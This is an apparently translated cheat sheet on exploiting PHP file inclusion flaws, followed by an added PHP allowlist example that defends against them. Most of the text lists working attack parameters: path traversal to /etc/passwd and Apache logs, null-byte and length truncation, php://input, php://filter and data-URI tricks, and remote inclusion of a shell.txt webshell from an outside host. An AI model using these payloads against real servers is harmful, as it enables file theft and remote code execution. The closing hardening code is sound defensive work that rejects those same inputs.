PHP file inclusion exploitation
First, the use of PHP configuration in file inclusion
A file inclusion vulnerability occurs when a programmer passes externally submitted data into a call that includes a file. It is the most exploited vulnerability in current web attacks, and it allows an attacker to easily gain access to the server (i.e. get a webshell). File inclusion is generally divided into local file inclusion (LFI) and remote file inclusion (RFI). allow_url_fopen and allow_url_include are the settings that decide whether an inclusion is local or remote; PHP 4 has only the allow_url_fopen option. When allow_url_fopen and allow_url_include are both On, the vulnerability is a remote file inclusion; otherwise it is a local file inclusion.

The two typical forms of file inclusion are as follows.

1. Inclusion that needs truncation

    include($_GET['SB']);
    include("{$_GET['dir']}/test.php");

To exploit this inclusion, the trailing /test.php has to be cut off. There are three ways to truncate the trailing data.

(1) Truncation with %00. Applies when: magic_quotes_gpc is off.

(2) Truncation with ?. Applies to: remote file inclusion (RFI). This is equivalent to constructing another GET request.

    http://127.0.0.1:81/include.php?dir=http://127.0.0.1:81/shell.txt?

(3) Truncation by the path length limit. The path is usually truncated at a length of 240, or 4096 on Linux. Applies to: all cases. Because Windows and Linux file names have a maximum path length (MAX_PATH) limit, when the submitted file name exceeds that limit the content after it is cut off, which achieves the truncation.

    include.php?dir=http://127.0.0.1:81/shell.txt/////////////////////

2. Direct inclusion

    include("{$_GET['dir']}");

The file name can be specified directly in dir, so the inclusion works without any truncation.

When register_globals is on and the variable is not initialized, file inclusion can also be achieved. The file inclusion vulnerabilities usually published on the Internet are not as direct as the two forms above; most of them need register_globals to achieve file inclusion.

Basic local file inclusion:

* Include a file in the same path: ?file=.htaccess
* Path traversal: ?file=./../../../../../../../../var/lib/locate.db (the file is very interesting because it allows you to search the file system)
* Include a file injected with PHP code: ?file=./../../../../../../../../var/log/apache/error.log (You can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.)

Restricted local file inclusion:

* Null byte injection: ?file=./../../../../../../../../etc/passwd%00 (requires magic_quotes_gpc=off)
* Directory listing (null byte injection): ?file=../../../../../../../../../var/www/accounts/%00 (BSD only, requires magic_quotes_gpc=off, details here)
* Path truncation: ?file=./../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ... (see here and here for more information)
* Dot truncation: ?file=./../../../../../../../../etc/passwd............... (Windows only, see here for more details)

Basic remote file inclusion:

* Include remote code: ?file=[http|https|ftp]://websec.wordpress.com/shell.txt (requires allow_url_fopen=On and allow_url_include=On)
* Using the PHP stream php://input: ?file=php://input (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
* Using the PHP stream php://filter: ?file=php://filter/convert.base64-encode/resource=index.php (lets you read PHP source because it won't get evaluated in base64. More details here and here)
* Using data URIs: ?file=data://text/plain;base64,ssbsb3zlifbiuao= (requires allow_url_include=On)
* Using XSS: ?file=http://127.0.0.1/path/xss.php?xss=phpcode (makes sense if firewalled or only whitelisted domains allowed)

Restricted remote file inclusion:

* ?file=http://websec.wordpress.com/shell
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23 (requires allow_url_fopen=On and allow_url_include=On)

Static remote file inclusion:

* Man-in-the-middle attack (lame indeed, but often forgotten)
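A hardened counterpart to the two include() forms above, as an added example that is not part of the original page: the request parameter selects a key in an allowlist instead of forming a path, and the resolved file is confirmed to sit under the template directory. PAGES, resolve_page() and the temporary directory are hypothetical names, and the example assumes allow_url_include is left Off in php.ini.

```php
<?php
// Added example, not from the original page. PAGES, resolve_page() and the
// temporary directory are hypothetical names chosen for illustration.
const PAGES = ['home' => 'home.php', 'about' => 'about.php']; // assumed allowlist

// Map the request parameter to a file under $baseDir, or return null.
function resolve_page(string $requested, string $baseDir, array $allow = PAGES): ?string
{
    // The parameter is only a lookup key and never becomes part of a path, so
    // %00, a trailing "?", "/////" padding and "../" have nothing to act on.
    if (!array_key_exists($requested, $allow)) {
        return null;
    }
    // Defence in depth: canonicalise, then confirm the file sits under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allow[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sandbox so the script runs offline.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home'; ?>\n");

// Constructed inputs modelled on the parameter shapes listed on this page.
$inputs = [
    'home',
    "../../../../etc/passwd\0",
    'http://127.0.0.1:81/shell.txt?',
    'php://filter/convert.base64-encode/resource=index.php',
    'about', // allowlisted, but the file is absent so realpath() fails
];
foreach ($inputs as $in) {
    $path = resolve_page($in, $dir);
    $verdict = $path === null ? 'rejected' : 'include ' . basename($path);
    echo json_encode($in, JSON_UNESCAPED_SLASHES), ' => ', $verdict, PHP_EOL;
}
unlink($dir . '/home.php');
rmdir($dir);
```

Only the first input resolves to a file; the caller would pass the returned path to include and answer every null with a 404.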